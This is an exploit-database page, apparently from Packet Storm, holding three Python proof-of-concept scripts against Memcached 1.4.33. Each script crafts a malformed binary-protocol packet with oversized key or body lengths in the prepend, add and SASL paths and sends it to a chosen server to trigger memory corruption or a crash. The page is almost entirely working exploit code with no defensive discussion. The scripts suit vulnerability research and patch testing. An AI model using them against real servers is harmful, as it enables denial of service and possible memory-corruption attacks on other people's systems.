Lucene search
DawuPACKETSTORM:139572
HistoryNov 03, 2016 - 12:00 a.m.
Memcached 1.4.33 Proof Of Concept

2016-11-0300:00:00
dawu
packetstormsecurity.com
0.883 High
EPSS
Percentile
98.4%
JSON
`# Source: http://paper.seebug.org/95/  
  
import struct   
import socket   
import sys  
  
MEMCACHED_REQUEST_MAGIC = "\x80"   
OPCODE_PREPEND_Q = "\x1a"   
key_len = struct.pack("!H",0xfa)   
extra_len = "\x00"   
data_type = "\x00"   
vbucket = "\x00\x00"   
body_len = struct.pack("!I",0)   
opaque = struct.pack("!I",0)   
CAS = struct.pack("!Q",0)   
body = "A"*1024  
  
if len(sys.argv) != 3:   
print "./poc_crash.py <server> <port>"  
  
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len   
packet += data_type + vbucket + body_len + opaque + CAS   
packet += body  
  
set_packet = "set testkey 0 60 4\r\ntest\r\n"   
get_packet = "get testkey\r\n"  
  
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s1.connect((sys.argv[1],int(sys.argv[2])))   
s1.sendall(set_packet)   
print s1.recv(1024)   
s1.close()  
  
  
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s2.connect((sys.argv[1],int(sys.argv[2])))   
s2.sendall(packet)   
print s2.recv(1024)   
s2.close()  
  
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s3.connect((sys.argv[1],int(sys.argv[2])))   
s3.sendall(get_packet)   
s3.recv(1024)   
s3.close()  
  
  
=========  
  
import struct   
import socket   
import sys  
  
  
MEMCACHED_REQUEST_MAGIC = "\x80"   
OPCODE_ADD = "\x02"   
key_len = struct.pack("!H",0xfa)   
extra_len = "\x08"   
data_type = "\x00"   
vbucket = "\x00\x00"   
body_len = struct.pack("!I",0xffffffd0)   
opaque = struct.pack("!I",0)   
CAS = struct.pack("!Q",0)   
extras_flags = 0xdeadbeef   
extras_expiry = struct.pack("!I",0xe10)   
body = "A"*1024  
  
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len   
packet += data_type + vbucket + body_len + opaque + CAS   
packet += body   
if len(sys.argv) != 3:   
print "./poc_add.py <server> <port>"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s.connect((sys.argv[1],int(sys.argv[2])))   
s.sendall(packet)   
print s.recv(1024)   
s.close()  
  
=========  
  
import struct   
import socket   
import sys  
  
  
MEMCACHED_REQUEST_MAGIC = "\x80"   
OPCODE_SET = "\x21"   
key_len = struct.pack("!H",32)   
body_len = struct.pack("!I",1)   
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000   
if len(sys.argv) != 3:   
print "./poc_sasl.py <server> <ip>"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
s.connect((sys.argv[1],int(sys.argv[2])))   
s.sendall(packet)   
print s.recv(1024)   
s.close()  
  
`
0.883 High
EPSS
Percentile
98.4%
JSON
Memcached 1.4.33 Proof Of Concept

Related
